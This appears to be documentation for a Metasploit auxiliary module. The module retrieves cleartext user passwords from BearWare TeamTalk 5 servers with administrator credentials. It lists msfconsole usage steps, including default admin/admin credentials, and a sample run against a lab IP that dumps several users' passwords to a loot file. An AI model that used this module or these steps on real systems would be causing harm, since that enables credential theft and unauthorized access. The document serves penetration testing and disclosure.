2.0 KiB
Description
This module retrieves user credentials from BearWare TeamTalk.
Valid administrator credentials are required.
Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges.
Vulnerable Application
TeamTalk 5 is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired.
This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.
The TeamTalk software is available on the BearWare website and on GitHub.
Verification Steps
- Start
msfconsole - Do:
use auxiliary/gather/teamtalk_creds - Do:
set rhost <RHOST> - Do:
set rport <RPORT>(default:10333) - Do:
set username <USERNAME>(default:admin) - Do:
set password <PASSWORD>(default:admin) - Do:
run - You should get credentials
Scenarios
[*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
[+] 172.16.191.166:10333 - Authenticated successfully
[+] 172.16.191.166:10333 - User is an administrator
[*] 172.16.191.166:10333 - Found 5 users
TeamTalk User Credentials
=========================
Username Password Type
-------- -------- ----
debbie 1234567890 1
murphy 934txs 2
quinn ~!@#$%^&*()_+{}|:" <>?;',./ 2
sparks password 2
stormy 1
[+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
[*] Auxiliary module execution completed